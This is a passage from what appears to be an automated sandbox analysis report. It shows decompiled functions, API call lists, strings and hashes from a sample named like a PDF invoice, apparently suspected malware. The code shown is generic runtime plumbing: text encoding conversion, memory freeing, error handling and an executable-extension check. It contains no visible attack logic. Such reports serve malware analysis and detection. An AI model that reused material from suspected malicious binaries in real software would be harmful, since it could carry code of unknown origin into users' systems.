                            						}
                            					}
                            					goto L20;
                            					L16:
                            				}
                            				L20:
                            				E0131786A();
                            				return _t136;
                            			}

                            APIs
                            • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,01323185,?,00000000,?,00000000,00000000), ref: 01322A52
                            • __fassign.LIBCMT ref: 01322ACD
                            • __fassign.LIBCMT ref: 01322AE8
                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 01322B0E
                            • WriteFile.KERNEL32(?,?,00000000,01323185,00000000,?,?,?,?,?,?,?,?,?,01323185,?), ref: 01322B2D
                            • WriteFile.KERNEL32(?,?,00000001,01323185,00000000,?,?,?,?,?,?,?,?,?,01323185,?), ref: 01322B66
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                            • String ID:
                            • API String ID: 1324828854-0
                            • Opcode ID: 9f82d53c7932f6bdb7ef92b9339c56e1d5bbbb45b6c2ef89299796072e4e38fd
                            • Instruction ID: e85fe1460474c5779a6725feafb0ecf146e591fcf20f926945536de5fbb692c8
                            • Opcode Fuzzy Hash: 9f82d53c7932f6bdb7ef92b9339c56e1d5bbbb45b6c2ef89299796072e4e38fd
                            • Instruction Fuzzy Hash: DE51C0B1A00219AFDF24DFA8DC85AEEBBF8FF09314F14455AE955E7241D730A941CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 56%
                            			E01314D40(void* __ecx, void* __edx, void* __eflags) {
                            				int* _t18;
                            				short* _t21;
                            				char* _t22;
                            				short* _t28;
                            				int* _t31;
                            				void* _t34;
                            				short* _t36;
                            				int* _t41;
                            				signed int _t42;
                            				char* _t44;
                            				int _t45;
                            				void* _t46;
                            				void* _t47;
                            				void* _t48;
                            
                            				_t34 = __edx;
                            				_t44 =  *(_t46 + 0x14);
                            				_push(4);
                            				_push( &(_t44[1]));
                            				_t18 = E013197F8(__ecx);
                            				_t31 = _t18;
                            				_t47 = _t46 + 8;
                            				if(_t31 != 0) {
                            					_t36 = 0;
                            					__eflags = _t44;
                            					if(_t44 <= 0) {
                            						L17:
                            						_t31[_t44] = 0;
                            						return _t31;
                            					} else {
                            						_t41 = _t31;
                            						_t21 =  *(_t47 + 0x20) - _t31;
                            						__eflags = _t21;
                            						 *(_t47 + 0x20) = _t21;
                            						while(1) {
                            							_t22 =  *(_t21 + _t41);
                            							 *(_t47 + 0x28) = _t22;
                            							_t45 = MultiByteToWideChar(0xfde9, 0, _t22, 0xffffffff, 0, 0);
                            							__eflags = _t45;
                            							if(__eflags == 0) {
                            								break;
                            							}
                            							_t7 = _t45 + 1; // 0x1
                            							_push(2);
                            							_push(_t7);
                            							_t28 = E013197F8(_t7);
                            							_t47 = _t47 + 8;
                            							 *(_t47 + 0x14) = _t28;
                            							__eflags = _t28;
                            							if(__eflags == 0) {
                            								_push("Out of memory.");
                            								_push("win32_utils_from_utf8");
                            								goto L13;
                            							} else {
                            								__eflags = MultiByteToWideChar(0xfde9, 0,  *(_t47 + 0x1c), 0xffffffff, _t28, _t45);
                            								if(__eflags == 0) {
                            									_push("Failed to decode wchar_t from UTF-8\n");
                            									L12:
                            									_push("MultiByteToWideChar");
                            									L13:
                            									E01311860(_t34, __eflags);
                            									_t48 = _t47 + 8;
                            									 *_t41 = 0;
                            									_t42 = 0;
                            									__eflags = _t36;
                            									if(_t36 >= 0) {
                            										do {
                            											L01319803(_t31[_t42]);
                            											_t42 = _t42 + 1;
                            											_t48 = _t48 + 4;
                            											__eflags = _t42 - _t36;
                            										} while (_t42 <= _t36);
                            									}
                            									L01319803(_t31);
                            									__eflags = 0;
                            									return 0;
                            								} else {
                            									_t36 =  &(_t36[0]);
                            									_t44 =  *(_t47 + 0x1c);
                            									 *_t41 =  *(_t47 + 0x14);
                            									_t41 =  &(_t41[1]);
                            									__eflags = _t36 - _t44;
                            									if(_t36 >= _t44) {
                            										goto L17;
                            									} else {
                            										_t21 =  *(_t47 + 0x20);
                            										continue;
                            									}
                            								}
                            							}
                            							goto L18;
                            						}
                            						_push("Failed to get wchar_t buffer size.\n");
                            						goto L12;
                            					}
                            				} else {
                            					return _t18;
                            				}
                            				L18:
                            			}


















                            APIs
                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,01313951,?,00000000,01313951,?), ref: 01314D95
                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 01314DC6
                            Strings
                            • Failed to get wchar_t buffer size., xrefs: 01314DFB
                            • Failed to decode wchar_t from UTF-8, xrefs: 01314DE8
                            • Out of memory., xrefs: 01314DEF
                            • win32_utils_from_utf8, xrefs: 01314DF4
                            • MultiByteToWideChar, xrefs: 01314E00
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide
                            • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                            • API String ID: 626452242-306716450
                            • Opcode ID: 6562478fa26fcc63d66122fd9fe350789fc62d6d7b5bc843ec3e49942ca7898c
                            • Instruction ID: 6582a99377bcf9e1854667b7a6b5f1c92d33b4cd34ed1d465d855fae31427794
                            • Opcode Fuzzy Hash: 6562478fa26fcc63d66122fd9fe350789fc62d6d7b5bc843ec3e49942ca7898c
                            • Instruction Fuzzy Hash: 6A319DB1648306ABDB206F5CAC41F6BBB98EF8071DF440139FE54A7284E775D50483A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 90%
                            			E0132534A(char* _a4, short* _a8) {
                            				int _v8;
                            				void* __ecx;
                            				short* _t10;
                            				short* _t14;
                            				int _t15;
                            				short* _t16;
                            				void* _t26;
                            				int _t27;
                            				void* _t29;
                            				short* _t35;
                            				short* _t39;
                            				short* _t40;
                            
                            				_push(_t29);
                            				if(_a4 != 0) {
                            					_t39 = _a8;
                            					__eflags = _t39;
                            					if(__eflags != 0) {
                            						_push(_t26);
                            						E0132369E(_t29, __eflags);
                            						asm("sbb ebx, ebx");
                            						_t35 = 0;
                            						_t27 = _t26 + 1;
                            						 *_t39 = 0;
                            						_t10 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, 0, 0);
                            						_v8 = _t10;
                            						__eflags = _t10;
                            						if(_t10 != 0) {
                            							_t40 = E01320A25(_t29, _t10 + _t10);
                            							__eflags = _t40;
                            							if(_t40 != 0) {
                            								_t15 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, _t40, _v8);
                            								__eflags = _t15;
                            								if(_t15 != 0) {
                            									_t16 = _t40;
                            									_t40 = 0;
                            									_t35 = 1;
                            									__eflags = 1;
                            									 *_a8 = _t16;
                            								} else {
                            									E0131C998(GetLastError());
                            								}
                            							}
                            							E013209EB(_t40);
                            							_t14 = _t35;
                            						} else {
                            							E0131C998(GetLastError());
                            							_t14 = 0;
                            						}
                            					} else {
                            						 *((intOrPtr*)(E0131C9CE())) = 0x16;
                            						E01321788();
                            						_t14 = 0;
                            					}
                            					return _t14;
                            				}
                            				 *((intOrPtr*)(E0131C9CE())) = 0x16;
                            				E01321788();
                            				return 0;
                            			}
















                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 35849a99248079fc8140a8a2c4a265fc431476c9558e37e06b0ea5cd57eb3fd8
                            • Instruction ID: 522dd09d1df05a845b50b4d6bb4f30b863c59a9b8abeb467239bbaf4ed12d6f2
                            • Opcode Fuzzy Hash: 35849a99248079fc8140a8a2c4a265fc431476c9558e37e06b0ea5cd57eb3fd8
                            • Instruction Fuzzy Hash: 4811B772604239BBDB253F799C44AAFBAADEB81729F105618F815D7140DA7089018760
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E01327F23(intOrPtr _a4) {
                            				void* _t18;
                            
                            				_t45 = _a4;
                            				if(_a4 != 0) {
                            					E01327EE7(_t45, 7);
                            					E01327EE7(_t45 + 0x1c, 7);
                            					E01327EE7(_t45 + 0x38, 0xc);
                            					E01327EE7(_t45 + 0x68, 0xc);
                            					E01327EE7(_t45 + 0x98, 2);
                            					E013209EB( *((intOrPtr*)(_t45 + 0xa0)));
                            					E013209EB( *((intOrPtr*)(_t45 + 0xa4)));
                            					E013209EB( *((intOrPtr*)(_t45 + 0xa8)));
                            					E01327EE7(_t45 + 0xb4, 7);
                            					E01327EE7(_t45 + 0xd0, 7);
                            					E01327EE7(_t45 + 0xec, 0xc);
                            					E01327EE7(_t45 + 0x11c, 0xc);
                            					E01327EE7(_t45 + 0x14c, 2);
                            					E013209EB( *((intOrPtr*)(_t45 + 0x154)));
                            					E013209EB( *((intOrPtr*)(_t45 + 0x158)));
                            					E013209EB( *((intOrPtr*)(_t45 + 0x15c)));
                            					return E013209EB( *((intOrPtr*)(_t45 + 0x160)));
                            				}
                            				return _t18;
                            			}





                            APIs
                              • Part of subcall function 01327EE7: _free.LIBCMT ref: 01327F10
                            • _free.LIBCMT ref: 01327F71
                              • Part of subcall function 013209EB: RtlFreeHeap.NTDLL(00000000,00000000,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?), ref: 01320A01
                              • Part of subcall function 013209EB: GetLastError.KERNEL32(?,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?,?), ref: 01320A13
                            • _free.LIBCMT ref: 01327F7C
                            • _free.LIBCMT ref: 01327F87
                            • _free.LIBCMT ref: 01327FDB
                            • _free.LIBCMT ref: 01327FE6
                            • _free.LIBCMT ref: 01327FF1
                            • _free.LIBCMT ref: 01327FFC
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 3345dd58f07dd0924e1d91aec4a26e5c9fbf2f87a575c696f6c07352f37f02c3
                            • Instruction ID: 4e8a999cd631be2a9efa90b18e16dabc4b586f82fe58bef6d3e92179e50681f8
                            • Opcode Fuzzy Hash: 3345dd58f07dd0924e1d91aec4a26e5c9fbf2f87a575c696f6c07352f37f02c3
                            • Instruction Fuzzy Hash: E3110D71650B26ABE620F7B5CC07FCB77EC6F24718F404C19F39E66060DA75AD0846A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 28%
                            			E01314BF0(short* _a4, char* _a8, int _a12) {
                            				void* _t17;
                            				void* _t18;
                            				int _t19;
                            				short* _t20;
                            				void* _t21;
                            
                            				_t20 = _a4;
                            				if(_t20 != 0) {
                            					_t19 = _a12;
                            					goto L6;
                            				} else {
                            					_t19 = MultiByteToWideChar(0xfde9, _t20, _a8, 0xffffffff, _t20, _t20);
                            					_t26 = _t19;
                            					if(_t19 != 0) {
                            						_t3 = _t19 + 1; // 0x1
                            						_push(2);
                            						_t20 = E013197F8(_t17);
                            						_t21 = _t21 + 8;
                            						__eflags = _t20;
                            						if(__eflags != 0) {
                            							L6:
                            							__eflags = MultiByteToWideChar(0xfde9, 0, _a8, 0xffffffff, _t20, _t19);
                            							if(__eflags != 0) {
                            								return _t20;
                            							} else {
                            								_push("Failed to decode wchar_t from UTF-8\n");
                            								_push("MultiByteToWideChar");
                            								E01311860(_t18, __eflags);
                            								__eflags = 0;
                            								return 0;
                            							}
                            						} else {
                            							_push("Out of memory.");
                            							_push("win32_utils_from_utf8");
                            							E01311860(_t18, __eflags);
                            							__eflags = 0;
                            							return 0;
                            						}
                            					} else {
                            						_push("Failed to get wchar_t buffer size.\n");
                            						_push("MultiByteToWideChar");
                            						E01311860(_t18, _t26);
                            						return 0;
                            					}
                            				}
                            			}









                            APIs
                            • MultiByteToWideChar.KERNEL32(0000FDE9,?,?,000000FF,?,?,?,?,01314117,?,?,00001000), ref: 01314C08
                              • Part of subcall function 01311860: GetLastError.KERNEL32(?,?), ref: 0131187D
                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,?,?,?,01314117,?,?,00001000), ref: 01314C69
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$ErrorLast
                            • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                            • API String ID: 1717984340-306716450
                            • Opcode ID: d9ac8dc41b34e30ca225d4eb0fae9cfa793ec6bd08d2d2bae69c0e0277dd156e
                            • Instruction ID: bfadb775df73f8b16adf56001fb02478da363a164cc6da01edd9fd3653822229
                            • Opcode Fuzzy Hash: d9ac8dc41b34e30ca225d4eb0fae9cfa793ec6bd08d2d2bae69c0e0277dd156e
                            • Instruction Fuzzy Hash: 7B012D3774423276CA25656F7C09ECB6698DFC0BBEF150625FA14A2284D250840582F6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 71%
                            			E01328F51(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                            				signed int _v8;
                            				int _v12;
                            				void* _v24;
                            				signed int _t49;
                            				signed int _t54;
                            				int _t56;
                            				signed int _t58;
                            				short* _t60;
                            				signed int _t64;
                            				short* _t68;
                            				int _t76;
                            				short* _t79;
                            				signed int _t85;
                            				signed int _t88;
                            				void* _t93;
                            				void* _t94;
                            				int _t96;
                            				short* _t99;
                            				int _t101;
                            				int _t103;
                            				signed int _t104;
                            				short* _t105;
                            				void* _t108;
                            
                            				_push(__ecx);
                            				_push(__ecx);
                            				_t49 =  *0x133c008; // 0xa3433343
                            				_v8 = _t49 ^ _t104;
                            				_t101 = _a20;
                            				if(_t101 > 0) {
                            					_t76 = E0132CA63(_a16, _t101);
                            					_t108 = _t76 - _t101;
                            					_t4 = _t76 + 1; // 0x1
                            					_t101 = _t4;
                            					if(_t108 >= 0) {
                            						_t101 = _t76;
                            					}
                            				}
                            				_t96 = _a32;
                            				if(_t96 == 0) {
                            					_t96 =  *( *_a4 + 8);
                            					_a32 = _t96;
                            				}
                            				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
                            				_v12 = _t54;
                            				if(_t54 == 0) {
                            					L38:
                            					E0131786A();
                            					return _t54;
                            				} else {
                            					_t93 = _t54 + _t54;
                            					_t83 = _t93 + 8;
                            					asm("sbb eax, eax");
                            					if((_t93 + 0x00000008 & _t54) == 0) {
                            						_t79 = 0;
                            						__eflags = 0;
                            						L14:
                            						if(_t79 == 0) {
                            							L36:
                            							_t103 = 0;
                            							L37:
                            							E0132815E(_t79);
                            							_t54 = _t103;
                            							goto L38;
                            						}
                            						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
                            						_t119 = _t56;
                            						if(_t56 == 0) {
                            							goto L36;
                            						}
                            						_t98 = _v12;
                            						_t58 = E01323980(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
                            						_t103 = _t58;
                            						if(_t103 == 0) {
                            							goto L36;
                            						}
                            						if((_a12 & 0x00000400) == 0) {
                            							_t94 = _t103 + _t103;
                            							_t85 = _t94 + 8;
                            							__eflags = _t94 - _t85;
                            							asm("sbb eax, eax");
                            							__eflags = _t85 & _t58;
                            							if((_t85 & _t58) == 0) {
                            								_t99 = 0;
                            								__eflags = 0;
                            								L30:
                            								__eflags = _t99;
                            								if(__eflags == 0) {
                            									L35:
                            									E0132815E(_t99);
                            									goto L36;
                            								}
                            								_t60 = E01323980(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
                            								__eflags = _t60;
                            								if(_t60 == 0) {
                            									goto L35;
                            								}
                            								_push(0);
                            								_push(0);
                            								__eflags = _a28;
                            								if(_a28 != 0) {
                            									_push(_a28);
                            									_push(_a24);
                            								} else {
                            									_push(0);
                            									_push(0);
                            								}
                            								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
                            								__eflags = _t103;
                            								if(_t103 != 0) {
                            									E0132815E(_t99);
                            									goto L37;
                            								} else {
                            									goto L35;
                            								}
                            							}
                            							_t88 = _t94 + 8;
                            							__eflags = _t94 - _t88;
                            							asm("sbb eax, eax");
                            							_t64 = _t58 & _t88;
                            							_t85 = _t94 + 8;
                            							__eflags = _t64 - 0x400;
                            							if(_t64 > 0x400) {
                            								__eflags = _t94 - _t85;
                            								asm("sbb eax, eax");
                            								_t99 = E01320A25(_t85, _t64 & _t85);
                            								_pop(_t85);
                            								__eflags = _t99;
                            								if(_t99 == 0) {
                            									goto L35;
                            								}
                            								 *_t99 = 0xdddd;
                            								L28:
                            								_t99 =  &(_t99[4]);
                            								goto L30;
                            							}
                            							__eflags = _t94 - _t85;
                            							asm("sbb eax, eax");
                            							E0132F250();
                            							_t99 = _t105;
                            							__eflags = _t99;
                            							if(_t99 == 0) {
                            								goto L35;
                            							}
                            							 *_t99 = 0xcccc;
                            							goto L28;
                            						}
                            						_t68 = _a28;
                            						if(_t68 == 0) {
                            							goto L37;
                            						}
                            						_t123 = _t103 - _t68;
                            						if(_t103 > _t68) {
                            							goto L36;
                            						}
                            						_t103 = E01323980(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
                            						if(_t103 != 0) {
                            							goto L37;
                            						}
                            						goto L36;
                            					}
                            					asm("sbb eax, eax");
                            					_t70 = _t54 & _t93 + 0x00000008;
                            					_t83 = _t93 + 8;
                            					if((_t54 & _t93 + 0x00000008) > 0x400) {
                            						__eflags = _t93 - _t83;
                            						asm("sbb eax, eax");
                            						_t79 = E01320A25(_t83, _t70 & _t83);
                            						_pop(_t83);
                            						__eflags = _t79;
                            						if(__eflags == 0) {
                            							goto L36;
                            						}
                            						 *_t79 = 0xdddd;
                            						L12:
                            						_t79 =  &(_t79[4]);
                            						goto L14;
                            					}
                            					asm("sbb eax, eax");
                            					E0132F250();
                            					_t79 = _t105;
                            					if(_t79 == 0) {
                            						goto L36;
                            					}
                            					 *_t79 = 0xcccc;
                            					goto L12;
                            				}
                            			}

                            APIs
                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0131C00D,0131C00D,?,?,?,013291A2,00000001,00000001,DEE85006), ref: 01328FAB
                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,013291A2,00000001,00000001,DEE85006,?,?,?), ref: 01329031
                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,DEE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0132912B
                            • __freea.LIBCMT ref: 01329138
                              • Part of subcall function 01320A25: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,013280E5,00000000,?,01320C3C,?,00000008,?,01323E2E,?,?,?), ref: 01320A57
                            • __freea.LIBCMT ref: 01329141
                            • __freea.LIBCMT ref: 01329166
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                            • String ID:
                            • API String ID: 1414292761-0
                            • Opcode ID: 90fb8d2ace449951e5bec308297b8a50fea47f156d5989593e1654393791ad23
                            • Instruction ID: c7aa4dd68e4af622cb59dfa7c3cbc7cc1c169d6af6af7919a172d54a677224f5
                            • Opcode Fuzzy Hash: 90fb8d2ace449951e5bec308297b8a50fea47f156d5989593e1654393791ad23
                            • Instruction Fuzzy Hash: 4951B67261023AABEB25AE69DC44FBB7BAAEF4465CF25462CFD04D6140DB34EC44C790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 71%
                            			E01324425(void* __ebx, void* __ecx, void* __edx) {
                            				void* __edi;
                            				void* __esi;
                            				intOrPtr _t2;
                            				void* _t3;
                            				void* _t4;
                            				intOrPtr _t9;
                            				void* _t11;
                            				void* _t20;
                            				void* _t21;
                            				void* _t23;
                            				void* _t25;
                            				void* _t27;
                            				void* _t29;
                            				void* _t31;
                            				void* _t32;
                            				long _t36;
                            				long _t37;
                            				void* _t40;
                            
                            				_t29 = __edx;
                            				_t23 = __ecx;
                            				_t20 = __ebx;
                            				_t36 = GetLastError();
                            				_t2 =  *0x133c238; // 0x6
                            				_t42 = _t2 - 0xffffffff;
                            				if(_t2 == 0xffffffff) {
                            					L2:
                            					_t3 = E01320B10(_t23, 1, 0x364);
                            					_t31 = _t3;
                            					_pop(_t25);
                            					if(_t31 != 0) {
                            						_t4 = E01323862(_t25, __eflags,  *0x133c238, _t31);
                            						__eflags = _t4;
                            						if(_t4 != 0) {
                            							E01324297(_t25, _t31, 0x13463f0);
                            							E013209EB(0);
                            							_t40 = _t40 + 0xc;
                            							__eflags = _t31;
                            							if(_t31 == 0) {
                            								goto L9;
                            							} else {
                            								goto L8;
                            							}
                            						} else {
                            							_push(_t31);
                            							goto L4;
                            						}
                            					} else {
                            						_push(_t3);
                            						L4:
                            						E013209EB();
                            						_pop(_t25);
                            						L9:
                            						SetLastError(_t36);
                            						E01320ACD(_t20, _t29, _t31, _t36);
                            						asm("int3");
                            						_push(_t20);
                            						_push(_t36);
                            						_push(_t31);
                            						_t37 = GetLastError();
                            						_t21 = 0;
                            						_t9 =  *0x133c238; // 0x6
                            						_t45 = _t9 - 0xffffffff;
                            						if(_t9 == 0xffffffff) {
                            							L12:
                            							_t32 = E01320B10(_t25, 1, 0x364);
                            							_pop(_t27);
                            							if(_t32 != 0) {
                            								_t11 = E01323862(_t27, __eflags,  *0x133c238, _t32);
                            								__eflags = _t11;
                            								if(_t11 != 0) {
                            									E01324297(_t27, _t32, 0x13463f0);
                            									E013209EB(_t21);
                            									__eflags = _t32;
                            									if(_t32 != 0) {
                            										goto L19;
                            									} else {
                            										goto L18;
                            									}
                            								} else {
                            									_push(_t32);
                            									goto L14;
                            								}
                            							} else {
                            								_push(_t21);
                            								L14:
                            								E013209EB();
                            								L18:
                            								SetLastError(_t37);
                            							}
                            						} else {
                            							_t32 = E0132380C(_t25, _t45, _t9);
                            							if(_t32 != 0) {
                            								L19:
                            								SetLastError(_t37);
                            								_t21 = _t32;
                            							} else {
                            								goto L12;
                            							}
                            						}
                            						return _t21;
                            					}
                            				} else {
                            					_t31 = E0132380C(_t23, _t42, _t2);
                            					if(_t31 != 0) {
                            						L8:
                            						SetLastError(_t36);
                            						return _t31;
                            					} else {
                            						goto L2;
                            					}
                            				}
                            			}

                            APIs
                            • GetLastError.KERNEL32(?,00000000,0131AFEC,00000000,?,?,0131A8EB,?,?,00000000), ref: 01324429
                            • _free.LIBCMT ref: 0132445C
                            • _free.LIBCMT ref: 01324484
                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 01324491
                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 0132449D
                            • _abort.LIBCMT ref: 013244A3
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ErrorLast$_free$_abort
                            • String ID:
                            • API String ID: 3160817290-0
                            • Opcode ID: aa70044f5ee7cd8a4832bdc3616c735a6db248ac7fc022410018da51c89c9566
                            • Instruction ID: 48c04078b80047f953cfef0d1a04ca6adfce44a717642b6d56829de36ea83445
                            • Opcode Fuzzy Hash: aa70044f5ee7cd8a4832bdc3616c735a6db248ac7fc022410018da51c89c9566
                            • Instruction Fuzzy Hash: 88F04632204B3277D62A327D6C08F2F2A7E9FC1B3CF200115F918F6195EF60C8068265
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0131D000(void* __ebx, void* __edi, intOrPtr _a4) {
                            				void* __esi;
                            				void* _t4;
                            
                            				_t21 = __edi;
                            				_t10 = __ebx;
                            				if(_a4 != 0) {
                            					_t23 = E0132F355(_a4, 0x2e);
                            					if(_t3 == 0 || E013251D5(__ebx, __edi, _t23, _t23, L".exe") != 0 && E013251D5(__ebx, __edi, _t23, _t23, L".cmd") != 0 && E013251D5(_t10, _t21, _t23, _t23, L".bat") != 0 && E013251D5(_t10, _t21, _t23, _t23, L".com") != 0) {
                            						_t4 = 0;
                            					} else {
                            						_t4 = 1;
                            					}
                            					return _t4;
                            				} else {
                            					return 0;
                            				}
                            			}

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _wcsrchr
                            • String ID: .bat$.cmd$.com$.exe
                            • API String ID: 1752292252-4019086052
                            • Opcode ID: c6e8f711095726d4300f1bc4e9e50b4633e67291ead793769a7cc265e9e4f9e8
                            • Instruction ID: 2395bf84c06812b81f25b4b10ef1fc1c242fbb716d3831d5d651da67ddf11104
                            • Opcode Fuzzy Hash: c6e8f711095726d4300f1bc4e9e50b4633e67291ead793769a7cc265e9e4f9e8
                            • Instruction Fuzzy Hash: 58F0BB3354A72735FD2D359E6C06ADB1B9C4F935FDB34001AFA0456AC4DE51E58350AC
                            Uniqueness

